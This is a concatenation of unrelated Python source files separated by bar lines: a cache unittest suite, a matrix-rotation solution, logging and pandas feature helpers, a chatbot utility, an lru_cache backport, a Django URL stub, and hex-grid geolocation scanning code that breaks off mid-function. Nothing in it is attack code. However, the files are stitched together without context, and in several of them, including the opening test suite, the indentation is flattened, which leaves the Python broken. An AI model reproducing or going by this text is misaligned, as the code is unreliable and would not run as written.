row['int'] = int(row['int'])
row['float'] = float(row['float'])
def fetch_one_day_data(self, day):
if day.year == 2018 and \
day.month == 8 and day.day == 1:
return [ { 'time': datetime.datetime(2018, 8, 1, 1, 0, 0),
'int': 42, 'str': "Hello, world", 'float':.001 },
{ 'time': datetime.datetime(2018, 8, 1, 13, 0, 0),
'int': 99, 'str': "Goodbye", 'float': 1000. }
]
elif day.year == 2018 and day.month == 2:
data = []
for hour in range(24):
data.append( { 'time': datetime.datetime(2018, 2, day.day,
hour, 0, 0),
'int': hour, 'str': "Hello, world",
'float': day.day + hour/100. })
return data
else:
morning = self.day_start(day)
return [ { 'time': morning + datetime.timedelta(hours=2),
'int': 42, 'str': "Hello, world", 'float': .001 },
{ 'time': morning + datetime.timedelta(hours=14),
'int': 99, 'str': "Goodbye", 'float': 1000.5 }
]
def clean_cachedir(self):
'''Remove all cache files from the cachedir.
'''
if not os.path.exists(self.cachedir):
return
for f in os.listdir(self.cachedir):
os.unlink(os.path.join(self.cachedir, f))
os.rmdir(self.cachedir)
class CacheTests(unittest.TestCase):
def __init__(self, *args, **kwargs):
super(CacheTests, self).__init__(*args, **kwargs)
self.cache = TestCache("test-cachefile")
# executed prior to each test
def setUp(self):
self.cache.clean_cachedir()
# executed after each test
def tearDown(self):
self.cache.clean_cachedir()
def test_cache_just_starttime(self):
# Make sure cachefile is created
# Python2 csv.DictWriter doesn't preserve field order.
self.cache.fieldnames = [ 'time', 'int', 'str', 'float' ]
test_date = datetime.datetime(2018, 8, 1, 12, 0)
self.cache.get_data(test_date)
self.assertEqual(self.cache.cachedir,
os.path.expanduser('~/.cache/test-cachefile'))
cachefile = os.path.join(self.cache.cachedir,
test_date.strftime('%Y-%m-%d') + ".csv")
assert os.path.exists(cachefile)
with open(cachefile) as fp:
file_contents = fp.read()
self.assertEqual(file_contents, '''time,int,str,float
2018-08-01 01:00:00,42,"Hello, world",0.001
2018-08-01 13:00:00,99,Goodbye,1000.0
''')
def test_cache_no_times(self):
# Test fetching with no time specified
now = datetime.datetime.now()
data = self.cache.get_data()
for d in data:
self.assertEqual(d['time'].year, now.year)
self.assertEqual(d['time'].month, now.month)
self.assertEqual(d['time'].day, now.day)
cachefile = os.path.join(self.cache.cachedir,
now.strftime('%Y-%m-%d') + ".csv")
assert os.path.exists(cachefile)
def test_multiple_days(self):
starttime = datetime.datetime(2018, 2, 10, 0, 0)
endtime = datetime.datetime(2018, 2, 12, 12, 0)
data = self.cache.get_data(starttime, endtime)
# Make sure we got data from the full range:
self.assertEqual(data[0],
{'time': datetime.datetime(2018, 2, 10, 0, 0),
'int': 0,
'str': 'Hello, world',
'float': 10.0})
self.assertEqual(data[32],
{'time': datetime.datetime(2018, 2, 11, 8, 0),
'int': 8,
'str': 'Hello, world',
'float': 11.08})
self.assertEqual(data[-1],
{'time': datetime.datetime(2018, 2, 12, 23, 0),
'int': 23,
'str': 'Hello, world',
'float': 12.23})
# and that we cached data for all those days:
assert os.path.exists(os.path.join(self.cache.cachedir,
'2018-02-10.csv'))
assert os.path.exists(os.path.join(self.cache.cachedir,
'2018-02-11.csv'))
assert os.path.exists(os.path.join(self.cache.cachedir,
'2018-02-12.csv'))
def test_file_locking(self):
# test_date = datetime.datetime(2018, 8, 1, 12, 0)
# self.cache.get_data(test_date)
self.cache.fieldnames = [ "time", "one", "two" ]
cachefile = "/tmp/cachetest"
try:
os.unlink(cachefile)
        except OSError:
            pass
realfp = self.cache.open_cache_file(cachefile)
self.cache.write_cache_line(realfp, { "time":
datetime.datetime(2018, 8, 1,
1, 0),
"one": 1,
"two": 2 })
with self.assertRaises(PermissionError):
secondfp = self.cache.open_cache_file("/tmp/cachetest")
self.cache.write_cache_line(realfp, { "time":
datetime.datetime(2018, 8, 1,
13, 0),
"one": 11,
"two": 22 })
with self.assertRaises(PermissionError):
thirdfp = self.cache.open_cache_file("/tmp/cachetest")
realfp.close()
with open(cachefile) as fp:
file_contents = fp.read()
self.assertEqual(file_contents, '''time,one,two
2018-08-01 01:00:00,1,2
2018-08-01 13:00:00,11,22
''')
def test_start_and_end_times(self):
# XXX Test day_start and day_end
# and test get_data() without start, end or both times
# and make sure it fetches data for the proper dates.
# Maybe make a class that returns date, year, month, day, hour, min, sec
midday = datetime.datetime(2018, 7, 15, 13, 0)
prevday = midday.replace(day = midday.day - 1)
nextday = midday.replace(day = midday.day + 1)
later = midday.replace(hour = 21)
# Test starttime only
starttime, endtime = self.cache.time_bounds(starttime=midday)
self.assertEqual(starttime.year, midday.year)
self.assertEqual(starttime.month, midday.month)
self.assertEqual(starttime.day, midday.day)
self.assertEqual(starttime.hour, midday.hour)
self.assertEqual(starttime.minute, 0)
self.assertEqual(endtime.year, midday.year)
self.assertEqual(endtime.month, midday.month)
self.assertEqual(endtime.day, midday.day)
self.assertEqual(endtime.hour, 23)
self.assertEqual(endtime.minute, 59)
# Test full day
starttime, endtime = self.cache.time_bounds(day=midday)
self.assertEqual(starttime.year, midday.year)
self.assertEqual(starttime.month, midday.month)
self.assertEqual(starttime.day, midday.day)
self.assertEqual(starttime.hour, 0)
self.assertEqual(starttime.minute, 0)
self.assertEqual(endtime.year, midday.year)
self.assertEqual(endtime.month, midday.month)
self.assertEqual(endtime.day, midday.day)
self.assertEqual(endtime.hour, 23)
self.assertEqual(endtime.minute, 59)
# Test endtime only
starttime, endtime = self.cache.time_bounds(endtime=midday)
self.assertEqual(starttime.year, midday.year)
self.assertEqual(starttime.month, midday.month)
self.assertEqual(starttime.day, midday.day)
self.assertEqual(starttime.hour, 0)
self.assertEqual(starttime.minute, 0)
self.assertEqual(endtime.year, midday.year)
self.assertEqual(endtime.month, midday.month)
self.assertEqual(endtime.day, midday.day)
self.assertEqual(endtime.hour, midday.hour)
self.assertEqual(endtime.minute, midday.minute)
# Test endtime on an earlier day
with self.assertRaises(ValueError):
starttime, endtime = self.cache.time_bounds(starttime=midday,
endtime=prevday)
# Test endtime on a later day
with self.assertRaises(ValueError):
starttime, endtime = self.cache.time_bounds(starttime=midday,
endtime=nextday)
# Test full day with now
starttime, endtime = self.cache.time_bounds(day=midday, now=midday)
self.assertEqual(starttime.year, midday.year)
self.assertEqual(starttime.month, midday.month)
self.assertEqual(starttime.day, midday.day)
self.assertEqual(starttime.hour, 0)
self.assertEqual(starttime.minute, 0)
self.assertEqual(endtime.year, midday.year)
self.assertEqual(endtime.month, midday.month)
self.assertEqual(endtime.day, midday.day)
self.assertEqual(endtime.hour, midday.hour)
self.assertEqual(endtime.minute, midday.minute)
# Test end time later than now
starttime, endtime = self.cache.time_bounds(starttime=midday,
endtime=later,
now=midday)
self.assertEqual(starttime.year, midday.year)
self.assertEqual(starttime.month, midday.month)
self.assertEqual(starttime.day, midday.day)
self.assertEqual(starttime.hour, midday.hour)
self.assertEqual(starttime.minute, midday.minute)
self.assertEqual(endtime.year, midday.year)
self.assertEqual(endtime.month, midday.month)
self.assertEqual(endtime.day, midday.day)
self.assertEqual(endtime.hour, midday.hour)
self.assertEqual(endtime.minute, midday.minute)
if __name__ == '__main__':
unittest.main()
|
class Solution(object):
def rotate(self, matrix):
"""
Rotate nxn 2D matrix clockwise (in-place)
:type matrix: List[List[int]]
:rtype: void Do not return anything, modify matrix in-place instead.
| 1 2 3 | | 7 4 1 |
| 4 5 6 | | 8 5 2 |
| 7 8 9 | | 9 6 3 |
"""
n = len(matrix)
if n == 0 or n == 1:
return
matrix.reverse()
for i in xrange(n):
for j in xrange(i+1, n):
matrix[i][j], matrix[j][i] = matrix[j][i], matrix[i][j]
return
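# Quick sanity check (assumed driver code, Python 2 to match the xrange
# above): rotating the 3x3 example from the docstring in place.
if __name__ == '__main__':
    m = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
    Solution().rotate(m)
    print m  # [[7, 4, 1], [8, 5, 2], [9, 6, 3]]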
|
import pygtk
import gtk
from IsCoder.Constants import *
from IsCoder.Plugin import Plugin
import locale
import gettext
locale.setlocale(locale.LC_ALL, "")
gettext.bindtextdomain("iscoder", DataDir + "/locale")
gettext.textdomain("iscoder")
_ = gettext.gettext
plugin = Plugin(_("MP3"), "Audio")
|
""" Module for logging facilities """
import logging
def init(logfile='logging.log', debug=False, verbose=False):
"""
Initialize logging handler
    A logging handler is initialized with default values and returned to
    the user (see the 'logging' package for more info).
By default, the returned handler will output log messages to a file called
    'logging.log', at INFO level, with no screen messages.
Input:
- logfile : Filename for logging messages
- debug : Use DEBUG level(?)
- verbose : Be verbose(?)
Output:
- logging.handler instance
"""
    level = logging.INFO
    if debug:
        level = logging.DEBUG
logging.basicConfig(level=level,
format='%(asctime)s %(module)-25s : %(levelname)-8s %(message)s',
datefmt='%m-%d %H:%M:%S',
filename=logfile,
filemode='w')
# and set a simpler format for these messages
formatter = logging.Formatter('%(module)-20s : %(levelname)-8s %(message)s')
    if verbose:
# Write INFO messages or higher to the console
console = logging.StreamHandler()
console.setLevel(logging.INFO)
# Tell the handler to use this format
console.setFormatter(formatter)
# Add the handler to the root logger
logging.getLogger('').addHandler(console)
    return logging
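# Minimal usage sketch (assumed filename): init() configures the root
# logger and returns the logging module itself, so callers log through
# the usual module-level functions.
if __name__ == '__main__':
    log = init(logfile='example.log', verbose=True)
    log.info('logging initialized')
    log.debug('only written when debug=True')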
|
import pandas as pd
import numpy as np
def regression_set(df, target_key, initial_time, horizon, deltat=0):
n_horizon = _calc_horizon(df.index, horizon)
n_deltat = _calc_horizon(df.index, deltat)
for n in range(n_deltat):
df = _shift_features(df, target_key, n+1)
df = _shift_features(df, key=target_key, shift=-n_horizon, target=True)
df = df[df.index >= initial_time]
y = np.array(df[target_key + '_tau'])
X = np.asmatrix(df.drop(target_key + '_tau', axis=1))
return X, y
def classification_set(df, target_key, t0, horizon, deltat, nominal=True):
n_horizon = _calc_horizon(df.index, horizon)
n_deltat = _calc_horizon(df.index, deltat)
for n in range(n_deltat):
df = _shift_features(df, target_key, n+1)
df = _shift_features(df, key=target_key, shift=-n_horizon, target=True)
df = classification_feature(df, target_key + '_tau', nominal=nominal)
df = df[df.index >= t0]
y = np.array(df[target_key + '_tau'])
X = np.asmatrix(df.drop(target_key + '_tau', axis=1))
return X, y
def _shift_features(df, key, shift, target=False):
if target:
df[key + '_tau'] = df[key].shift(shift)
else:
df[key + '_' + str(shift)] = df[key].shift(shift)
df = df.dropna(axis=0)
return df
def _calc_horizon(index, horizon):
first = index[0]
for i in range(len(index)):
if index[i] >= first + horizon:
return i
def classification_feature(df, key, width=0.417, threshold=0.5, nominal=False, drop_key=True):
"""
Creates a classification of events based on the behavior of one of the features.
df: Pandas Dataframe
The dataframe of the data without classification index
key: String
A key of the dataframe according to which the classification is performed
width: Float
The width of the window, according to the index of the dataframe, for which
an event is considered as such
threshold: Float
The thresholding value above which the event is considered as such
:returns: Pandas Dataframe with a classification key added
"""
classification_list = np.array([])
k = 0
while True:
for i in range(k, len(df)):
if df[key][df.index[i]] >= threshold:
begin = i
break
begin = i
for i in range(begin+1, len(df)):
if df[key][df.index[i]] < threshold:
end = i-1
break
end = i
if df.index[end] - df.index[begin] > width:
for i in range(k, begin):
classification_list = np.append(classification_list, 'no' if nominal else int(0))
for i in range(begin, end+1):
classification_list = np.append(classification_list, 'yes' if nominal else int(1))
else:
for i in range(k, end+1):
classification_list = np.append(classification_list, 'no' if nominal else int(0))
k = end + 1
if end == len(df) -1:
break
if begin > end:
for i in range(k, len(df)):
classification_list = np.append(classification_list, 'no' if nominal else int(0))
break
df[key + '_class'] = pd.Series(classification_list, index=df.index)
if drop_key:
del df[key]
return df
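# Minimal usage sketch (assumed data, not from the original project): a
# signal with one sustained excursion above the 0.5 threshold, wide enough
# (index span > 0.417) to be labelled as an event.
if __name__ == '__main__':
    idx = np.arange(0, 2.0, 0.1)        # the index plays the role of time
    sig = np.where((idx > 0.5) & (idx < 1.5), 1.0, 0.0)
    demo = pd.DataFrame({'flux': sig}, index=idx)
    labelled = classification_feature(demo, 'flux', nominal=True, drop_key=False)
    print(labelled['flux_class'].value_counts())  # expect 11 'no', 9 'yes'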
|
import pyActiveCollab as pyac
import json
ac = pyac.activeCollab("~/.activeCollab", log_level="info")
print json.dumps(json.loads(ac.get_info()), indent=4, sort_keys=True)
|
Sphere()
Shrink()
Show()
Render()
|
from heppy.framework.analyzer import Analyzer
from heppy.statistics.tree import Tree
from heppy_fcc.analyzers.ntuple import *
from ROOT import TFile
class IsoParticleTreeProducer(Analyzer):
def beginLoop(self, setup):
super(IsoParticleTreeProducer, self).beginLoop(setup)
self.rootfile = TFile('/'.join([self.dirName,
'tree.root']),
'recreate')
self.tree = Tree( self.cfg_ana.tree_name,
self.cfg_ana.tree_title )
bookIsoParticle(self.tree, 'ptc')
def process(self, event):
self.tree.reset()
leptons = getattr(event, self.cfg_ana.leptons)
pdgids = [211, 22, 130]
for lepton in leptons:
for pdgid in pdgids:
iso = getattr(lepton, 'iso_{pdgid:d}'.format(pdgid=pdgid))
for ptc in iso.on_ptcs:
self.tree.reset()
fillIsoParticle(self.tree, 'ptc', ptc, lepton)
self.tree.tree.Fill()
def write(self, setup):
self.rootfile.Write()
self.rootfile.Close()
|
import pybot.globals as globals
import pybot.data as data
import re
import os
def pybotPrint(text, mode=""):
settings = globals.settings
if (data.toBool(settings.config["print"]["HTML"])):
print("<div class='pybot-out-" + mode + "'>" + text + "</div>")
else:
print(text)
globals.data.logs.append(text)
def checkIfCommand(text, *cmds_, addc=True):
found = False
cmds = list(cmds_)
i = 0
concat = ""
app = globals.settings.config['compatibility']['append_to_commands']
if app != '' and addc:
cmds[0] = cmds[0][0] + app + cmds[0][1:]
for cmd in cmds:
regx = re.compile('^' + concat + '(' + cmd + ') *', re.IGNORECASE)
if regx.search(text.strip()) and len(text.split(" ")[1 + i]) == len(cmd):
found = True
concat += text.split(" ")[1 + i] + " "
else:
found = False
break
i += 1
return found
def splitButNotQuotes(text):
    text = text.strip()
    split = []
    pos = 0
    token = ""
    quote = False
    while pos < len(text):
        if text[pos] == '"':
            quote = not quote
        if text[pos] == ' ' and not quote:
            split.append(token)
            token = ""
        else:
            token = token + text[pos]
        pos += 1
    if token:
        split.append(token)
    return split
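# Example (assumed input): spaces inside double quotes do not split.
if __name__ == '__main__':
    print(splitButNotQuotes('say "hello world" twice'))
    # -> ['say', '"hello world"', 'twice']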
def allFilters():
dir = 'filters/'
return [f.replace('.py', '') for f in os.listdir(dir) if os.path.isfile(os.path.join(dir, f))]
|
from collections import namedtuple
from functools import update_wrapper
from threading import RLock
_CacheInfo = namedtuple("CacheInfo", ["hits", "misses", "maxsize", "currsize"])
class _HashedSeq(list):
__slots__ = 'hashvalue'
def __init__(self, tup, hash=hash):
self[:] = tup
self.hashvalue = hash(tup)
def __hash__(self):
return self.hashvalue
def _make_key(args, kwds, typed,
kwd_mark=(object(),),
fasttypes={int, str, frozenset, type(None)},
sorted=sorted, tuple=tuple, type=type, len=len):
"""Make a cache key from optionally typed positional and keyword arguments."""
key = args
if kwds:
sorted_items = sorted(kwds.items())
key += kwd_mark
for item in sorted_items:
key += item
if typed:
key += tuple(type(v) for v in args)
if kwds:
key += tuple(type(v) for k, v in sorted_items)
elif len(key) == 1 and type(key[0]) in fasttypes:
return key[0]
return _HashedSeq(key)
def lru_cache(maxsize=100, typed=False):
def decorating_function(user_function):
cache = dict()
stats = [0, 0] # make statistics updateable non-locally
HITS, MISSES = 0, 1 # names for the stats fields
make_key = _make_key
cache_get = cache.get # bound method to lookup key or return None
_len = len # localize the global len() function
lock = RLock() # because linkedlist updates aren't threadsafe
root = [] # root of the circular doubly linked list
root[:] = [root, root, None, None] # initialize by pointing to self
nonlocal_root = [root] # make updateable non-locally
PREV, NEXT, KEY, RESULT = 0, 1, 2, 3 # names for the link fields
if maxsize == 0:
def wrapper(*args, **kwds):
# no caching, just do a statistics update after a successful call
result = user_function(*args, **kwds)
stats[MISSES] += 1
return result
elif maxsize is None:
def wrapper(*args, **kwds):
# simple caching without ordering or size limit
key = make_key(args, kwds, typed)
result = cache_get(key, root) # root used here as a unique not-found sentinel
if result is not root:
stats[HITS] += 1
return result
result = user_function(*args, **kwds)
cache[key] = result
stats[MISSES] += 1
return result
else:
def wrapper(*args, **kwds):
# size limited caching that tracks accesses by recency
key = make_key(args, kwds, typed) if kwds or typed else args
with lock:
link = cache_get(key)
if link is not None:
# record recent use of the key by moving it to the front of the list
root, = nonlocal_root
link_prev, link_next, key, result = link
link_prev[NEXT] = link_next
link_next[PREV] = link_prev
last = root[PREV]
last[NEXT] = root[PREV] = link
link[PREV] = last
link[NEXT] = root
stats[HITS] += 1
return result
result = user_function(*args, **kwds)
with lock:
root, = nonlocal_root
if key in cache:
# getting here means that this same key was added to the
# cache while the lock was released. since the link
# update is already done, we need only return the
# computed result and update the count of misses.
pass
elif _len(cache) >= maxsize:
# use the old root to store the new key and result
oldroot = root
oldroot[KEY] = key
oldroot[RESULT] = result
# empty the oldest link and make it the new root
root = nonlocal_root[0] = oldroot[NEXT]
oldkey = root[KEY]
oldvalue = root[RESULT]
root[KEY] = root[RESULT] = None
# now update the cache dictionary for the new links
del cache[oldkey]
cache[key] = oldroot
else:
# put result in a new link at the front of the list
last = root[PREV]
link = [last, root, key, result]
last[NEXT] = root[PREV] = cache[key] = link
stats[MISSES] += 1
return result
def cache_info():
"""Report cache statistics."""
with lock:
return _CacheInfo(stats[HITS], stats[MISSES], maxsize, len(cache))
def cache_clear():
"""Clear the cache and cache statistics."""
with lock:
cache.clear()
root = nonlocal_root[0]
root[:] = [root, root, None, None]
stats[:] = [0, 0]
wrapper.__wrapped__ = user_function
wrapper.cache_info = cache_info
wrapper.cache_clear = cache_clear
return update_wrapper(wrapper, user_function)
return decorating_function
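# Usage sketch for the backport above: memoize a recursive Fibonacci and
# inspect hit/miss statistics through the attached cache_info().
if __name__ == '__main__':
    @lru_cache(maxsize=32)
    def fib(n):
        return n if n < 2 else fib(n - 1) + fib(n - 2)

    print(fib(20))           # 6765
    print(fib.cache_info())  # CacheInfo(hits=18, misses=21, maxsize=32, currsize=21)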
|
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^$', views.index, name='index'),
]
|
from math import pi,radians, cos, sin, asin, sqrt, ceil, floor
from s2sphere import CellId, LatLng, Cell, MAX_AREA, Point
from operator import itemgetter
earth_Rmean = 6371000.0
earth_Rrect = 6367000.0
earth_Rmax = 6378137.0
earth_Rmin = 6356752.3
def earth_Rreal(latrad):
return (1.0 / (((cos(latrad)) / earth_Rmax) ** 2 + ((sin(latrad)) / earth_Rmin) ** 2)) ** 0.5
max_size = 1 << 30
lvl_big = 10
lvl_small = 17
HEX_R = 70.0
safety = 0.999
safety_border = 0.9
def get_distance(location1, location2):
lat1, lng1 = location1
lat2, lng2 = location2
lat1, lng1, lat2, lng2 = map(radians, (lat1, lng1, lat2, lng2))
d = sin(0.5*(lat2 - lat1)) ** 2 + cos(lat1) * cos(lat2) * sin(0.5*(lng2 - lng1)) ** 2
return 2 * earth_Rrect * asin(sqrt(d))
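# Quick sanity check (assumed coordinates, rounded): Berlin (52.52, 13.405)
# to Paris (48.8566, 2.3522) comes out near 877 km, i.e.
# get_distance((52.52, 13.405), (48.8566, 2.3522)) is roughly 877000 m.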
def get_border_pseudohex(coords, HEX_NUM):
border = []
for a in range(0, 6):
tcoord = coords[-HEX_NUM * (6 - a)]
tcoord = neighbor_circle(tcoord, a, False, 0.5)
border.append(tcoord)
border.append(border[0])
return border
def get_border_cell(s2_id):
locs = []
s2_cell = Cell(s2_id)
for i in [0, 1]:
for j in [0, 1]:
locs.append([s2_cell.get_latitude(i, j) * 180 / pi, s2_cell.get_longitude(i, j) * 180 / pi])
output = [locs[0], locs[1], locs[3], locs[2], locs[0]]
return output
def neighbor_pseudohex(location, HEX_NUM, pos):
pos = pos % 6
torange = HEX_NUM * (3 ** 0.5) + 1
while torange > 1:
location = neighbor_circle(location, pos, shift=True)
torange -= 1
location = neighbor_circle(location, pos, shift=True, factor=torange)
location = neighbor_circle(location, pos + 2, shift=True, factor=0.5)
return location
def get_pseudo_hex(location, layer_max, layer_min=0):
coords = []
if layer_max < 0 or layer_min > layer_max:
return coords
coords.append(location[:])
if layer_max < 1:
return coords
for b in range(0, 6):
coords.append(neighbor_pseudohex(coords[0], 30, b))
offs = 1
for n in range(1, layer_max):
offs = offs + 6 * (n - 1)
for b in range(0, 6 * n):
            coords.append(neighbor_pseudohex(coords[b + offs], 30, b // n))
            if b % n == n - 1:
                coords.append(neighbor_pseudohex(coords[b + offs], 30, b // n + 1))
if layer_min < 1:
return coords
ind_f = 1
for l in range(1, layer_min):
ind_f += 6 * l
return coords[ind_f:]
def neighbor_circle(location, pos, shift=False, factor=1.0):
pos = pos % 6
latrad = location[0] * pi / 180
x_un = factor * safety / earth_Rrect / cos(latrad) * 180 / pi
y_un = factor * safety / earth_Rrect * 180 / pi
if not shift:
y_un = y_un * (3.0 ** 0.5) / 2.0 * HEX_R
x_un = x_un * HEX_R * 1.5
yvals = [-2, -1, 1, 2, 1, -1]
xvals = [0, 1, 1, 0, -1, -1]
else:
y_un = y_un * HEX_R * 1.5
x_un = x_un * (3.0 ** 0.5) / 2.0 * HEX_R
yvals = [-1, 0, 1, 1, 0, -1]
xvals = [1, 2, 1, -1, -2, -1]
newlat = location[0] + y_un * yvals[pos]
newlng = ((location[1] + x_un * xvals[pos] + 180) % 360) - 180
return (newlat, newlng)
def get_area_spiral(location, layer_max, layer_min=0):
coords = []
if layer_max < 0:
return coords
coords.append(location[:])
if layer_max < 1:
return coords
for b in range(0, 6):
coords.append(neighbor_circle(coords[0], b))
offs = 1
for n in range(1, layer_max):
offs = offs + 6 * (n - 1)
for b in range(0, 6 * n):
            coords.append(neighbor_circle(coords[b + offs], b // n))
            if b % n == n - 1:
                coords.append(neighbor_circle(coords[b + offs], b // n + 1))
if layer_min < 1:
return coords
elif layer_min > layer_max:
return []
ind_f = 1
for l in range(1, layer_min):
ind_f += 6 * l
return coords[ind_f:]
def ij_offs(cell_in, offs_i, offs_j): # input type is CellId
face, i, j = cell_in.to_face_ij_orientation()[0:3]
size = cell_in.get_size_ij(cell_in.level())
i_new = i + size * offs_i
j_new = j + size * offs_j
out = cell_in.from_face_ij_same(face, i_new, j_new, j_new >= 0 and i_new >= 0 and i_new < max_size and j_new < max_size).parent(cell_in.level())
return out # output type is CellId
def neighbor_s2_circle(location, i_dir=0.0, j_dir=0.0): # input location can be list, tuple or Point
if type(location) in (list, tuple):
ll_location = LatLng.from_degrees(location[0], location[1])
elif type(location) is Point:
ll_location = LatLng.from_point(location)
elif type(location) is LatLng:
ll_location = location
else:
return None
cid_large = CellId.from_lat_lng(ll_location).parent(lvl_big)
cid_small = cid_large.child_begin(lvl_small)
vec_to_j = (Cell(ij_offs(cid_small, 0, 1)).get_center() - Cell(cid_small).get_center()).normalize()
vec_to_i = (Cell(ij_offs(cid_small, 1, 0)).get_center() - Cell(cid_small).get_center()).normalize()
vec_newlocation = ll_location.to_point() + safety * HEX_R / earth_Rrect * (i_dir * 3 ** 0.5 * vec_to_i + j_dir * 1.5 * vec_to_j)
return vec_newlocation # output is Point
def get_area_cell(location,unfilled=False):
border = []
locs = []
cid_large = CellId.from_lat_lng(LatLng.from_degrees(location[0], location[1])).parent(lvl_big)
border.append(get_border_cell(cid_large))
if unfilled:
return [], border, cid_large
corner = neighbor_s2_circle(LatLng.from_degrees(border[-1][0][0], border[-1][0][1]), safety_border*0.5, safety_border/3.0)
j_maxpoint = LatLng.from_point(neighbor_s2_circle(LatLng.from_degrees(border[-1][1][0], border[-1][1][1]), safety_border*0.5, (1-safety_border)/3.0))
i_maxpoint = LatLng.from_point(neighbor_s2_circle(LatLng.from_degrees(border[-1][3][0], border[-1][3][1]), (1-safety_border)*0.5, safety_border/3.0))
base = corner
p_start = base
dist_j = j_maxpoint.get_distance(LatLng.from_point(p_start))
last_dist_j = None
j = 0
while last_dist_j is None or dist_j < last_dist_j:
dist_i = i_maxpoint.get_distance(LatLng.from_point(p_start))
last_dist_i = None
while last_dist_i is None or dist_i < last_dist_i:
locs.append(LatLng.from_point(p_start))
p_start = neighbor_s2_circle(p_start, 1.0, 0.0)
last_dist_i = dist_i
dist_i = i_maxpoint.get_distance(LatLng.from_point(p_start))
base = neighbor_s2_circle(base, 0.0, 1.0)
last_dist_j = dist_j
dist_j = j_maxpoint.get_distance(LatLng.from_point(base))
if j % 2 == 1:
p_start = base
else:
p_start = neighbor_s2_circle(base, -0.5, 0.0)
j += 1
all_loc = []
for loc in locs:
all_loc.append([loc.lat().degrees, loc.lng().degrees])
return all_loc, border,cid_large
def workers_for_level(lvl,parts):
area = MAX_AREA.get_value(lvl) * earth_Rmean**2
area_scan = 1.5*3**0.5 * HEX_R**2
num_scans = area / area_scan
num_scans_ph_max = num_scans * 5 * 2 #10 minute time (* 6) and all cells empty (* 2)
num_worker_scans_ph = 3600.0 / 10 - 2 #reauthorizations (- 2)
num_workers_required = int(ceil(num_scans_ph_max / parts /num_worker_scans_ph))
return num_workers_required
def workers_for_number(num_scans,parts=1):
num_scans_ph_max = num_scans * 5 * 2 #10 minute time (* 6) and all cells empty (* 2)
num_worker_scans_ph = 3600.0 / 10 - 2 #reauthorizations (- 2)
num_workers_required = int(ceil(num_scans_ph_max/ num_worker_scans_ph /parts))
return num_workers_required
class Hexgrid(object):
earth_R = earth_Rrect
param_shift = 217.91
param_stretch = 591
r_sight = 70.0
safety = 0.999
def __init__(self):
self.grid = self.init_grid()
def init_lats(self):
latrad = 0.0
lats = []
c = 0.5 * self.r_sight * self.safety
while latrad < pi / 2:
lats.append(latrad)
latrad += c / self.earth_R
return lats
def init_grid(self):
grid_all = []
lats = self.init_lats()
c = 2 * pi / (3 ** 0.5 * self.r_sight * self.safety) * self.earth_R
even_lng = True
strip_amount = int(ceil(c))
grid_all.append((0, strip_amount, even_lng))
ind_lat = 2
while ind_lat < len(lats):
amount = int(ceil(c * cos(lats[ind_lat])))
if amount < strip_amount - (sin(lats[ind_lat]*2)*self.param_shift+self.param_stretch):
ind_lat -= 1
strip_amount = int(ceil(c * cos(lats[ind_lat])))
else:
even_lng = not even_lng
if ind_lat + 1 < len(lats):
lat = lats[ind_lat + 1] * 180 / pi
grid_all.append((lat, strip_amount, even_lng))
ind_lat += 3
grid_all.append((90.0, 1, True)) # pole
return grid_all
def dist_cmp(self, location1, location2):
return sin(0.5 * (location2[0] - location1[0])) ** 2 + cos(location2[0]) * cos(location1[0]) * sin(0.5 * (location2[1] - location1[1])) ** 2
def cover_circle(self,loc,radius):
lat,lng = loc
output = []
r_lat = radius / earth_Rrect*180/pi
r_lng = r_lat /cos(min(abs(lat)+r_lat,90.0)*pi/180)
locations = self.cover_region((lat-r_lat,lng-r_lng),(lat+r_lat,lng+r_lng))
for location in locations:
dist = get_distance(loc,location)
if dist < radius:
output.append(location)
return output
def cover_cell(self, cid):
lats = []
lngs = []
output = []
s2_cell = Cell(cid)
lvl = s2_cell.level()
for i in [0, 1]:
for j in [0, 1]:
lats.append(s2_cell.get_latitude(i, j)/pi*180)
lngs.append(s2_cell.get_longitude(i, j)/pi*180)
locations = self.cover_region((min(lats),min(lngs)),(max(lats),max(lngs)))
for location in locations:
testid = CellId.from_lat_lng(LatLng.from_degrees(location[0],location[1])).parent(lvl)
if testid == cid:
output.append(location)
return output
def cover_region(self, location1, location2):
l_lat1 = location1[0]
l_lat2 = location2[0]
l_lng1 = location1[1]
l_lng2 = location2[1]
if l_lat1 > l_lat2:
l_lat1, l_lat2 = l_lat2, l_lat1
range_lat = []
if l_lat1 >= 0 and l_lat2 >= 0:
range_lat.append([[l_lat1, l_lat2], False])
elif l_lat1 <= 0 and l_lat2 <= 0:
range_lat.append([[-l_lat2, -l_lat1], True])
else:
range_lat.append([[0.0, -l_lat1], True])
range_lat.append([[0.0, l_lat2], False])
if l_lng1 > l_lng2:
l_lng1, l_lng2 = l_lng2, l_lng1
l_lng1 = l_lng1 % 360
l_lng2 = l_lng2 % 360
range_lng = []
if l_lng1 > l_lng2:
range_lng.append([l_lng1, 360.0])
range_lng.append([0.0, l_lng2])
else:
range_lng.append([l_lng1, l_lng2])
points = []
for r_lat in range_lat:
for r_lng in range_lng:
newpoints = self.cover_region_simple((r_lat[0][0], r_lng[0]), (r_lat[0][1], r_lng[1]))
for point in newpoints:
if point[1] == 360.0:
continue
if r_lat[1]:
if point[0] == 0.0:
continue
else:
point[0] = -point[0]
point[1] = (point[1] + 180) % 360 - 180
points.append(point)
points.sort(key=itemgetter(0,1))
return points
def cover_region_simple(self, location1, location2): # lat values must be between -90 and +90, lng values must be between -180 and 180
l_lat1 = location1[0]
l_lat2 = location2[0]
l_lng1 = location1[1]
l_lng2 = location2[1]
ind_lat_f = 0
while l_lat1 > self.grid[ind_lat_f][0]:
ind_lat_f += 1
ind_lat_t = ind_lat_f + 1
while ind_lat_t < len(self.grid) and l_lat2 >= self.grid[ind_lat_t][0]:
ind_lat_t += 1
points = []
for ind_lat in range(ind_lat_f, ind_lat_t):
d_lng = 360.0 / self.grid[ind_lat][1]
if self.grid[ind_lat][2]:
c_lng = 0.0
else:
c_lng = 0.5
ind_lng_f = int(ceil(l_lng1 / d_lng - c_lng))
ind_lng_t = int(floor(l_lng2 / d_lng - c_lng))
for ind_lng in range(ind_lng_f, ind_lng_t + 1):
points.append([self.grid[ind_lat][0], d_lng * (ind_lng + c_lng)])
return points
def to_grid_point(self, location):
l_lat = location[0]
l_lng = location[1]
if l_lat < 0:
l_lat = -l_lat
neg_lat = True
else:
neg_lat = False
l_lng = l_lng % 360
poss = []
ind_lat = 0
while l_lat > self.grid[ind_lat][0]:
ind_lat += 1
if l_lat == self.grid[ind_lat][0]:
ind_f = ind_lat
else:
ind_f = ind_lat - 1
